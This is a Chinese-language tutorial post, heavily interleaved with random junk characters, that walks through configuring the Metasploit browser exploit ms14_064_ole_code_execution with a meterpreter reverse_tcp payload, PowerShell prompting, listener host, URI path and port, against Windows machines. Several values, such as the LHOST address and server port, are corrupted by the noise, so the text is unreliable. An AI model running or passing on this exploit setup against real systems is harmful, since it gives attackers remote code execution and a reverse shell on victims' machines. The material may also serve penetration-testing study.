/ a/ ^$ v# D0 J$ b
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
$ M' a% A: O2 x' E6 Y/ J; M
& H% o6 O2 p$ E( l( c, q1 h4 q
' V8 G, c/ ?$ D
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
- l/ ?2 b2 \' E3 s( u3 I
" [4 M o7 [; H' O) u2 x1 i2 q) J+ p
" C+ z$ s, h7 Y 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
8 M; I2 h2 k# G5 A. z: S. `2 M' W- P
- h" f4 z8 [5 X1 W4 [, k7 j0 o- w2 b& [; u! I6 D2 \
set AllowPowershellPrompt true& e8 r! h/ v; | h4 B- T! `1 P! b* M
9 c9 b$ b. P# h, D; a8 h; t2 `1 V6 M. {# A) y- o( U
Set LHOST 192.168.0.1097 n; k0 y; q/ b& D0 Q& W. L
& N* n& ^+ A, h( b; s5 h( l2 w5 M" ? ~% |8 a* o7 e! ^
set SRVHOST 192.168.0.109
5 T9 j$ Q2 u+ p& T, j- V
b1 b+ W; Z" h2 R3 Y t. m1 N7 ]+ M! d
Set uripath share
+ ^& k) I1 b* o3 j
# B$ J* j! v9 H2 u/ S9 l H- W
& k% T, |& \+ I Set srvport 806 @/ D- B. U1 X
. I: ^* A& Z9 [9 u% X* v3 {3 P5 M* y
$ T( U4 y9 R |* U
( _3 C7 k% q/ v! Y+ m4 w; [! @5 j+ B I7 {% H
6 T' ^* {. J" ]6 ^! @
; f4 _8 G4 i) B: c5 e2 S
* R- l1 K d4 t4 t2 |+ \
/ f0 S( }' [6 s6 d
4 u ^5 ?$ p( q# ~$ ?, C: A2 z* Z s
. J5 `% C1 b& _. w. [9 g" ~% c
. z& r! [1 q/ Z
& c# U4 p4 Z' [; G" f# R g1 f% z
! S/ L/ X1 o) O7 [5 T. A q R% ~- ?; X+ }# {: {/ T2 G
* }% ]0 u% ~* z, k B `) {( |
; R3 W2 ^+ ] s1 i$ Q 下面我们来访问本地地址如图:
" y5 i8 v# Y9 |) v1 p
4 Q9 @7 e, n) X$ ^
$ E4 J+ _) k0 h$ U0 A' i1 m 2 V" J: c4 ^; @% m8 R9 B/ k$ ]$ s5 s
6 S- u, O" z2 _
5 n) W$ d) [/ F
" Y2 c M* V6 |7 f3 p& }
/ Y: S2 B) h( d" t( r- C+ y/ B: Y5 D# W$ r( i
+ i3 h, `7 L0 X8 z% g3 A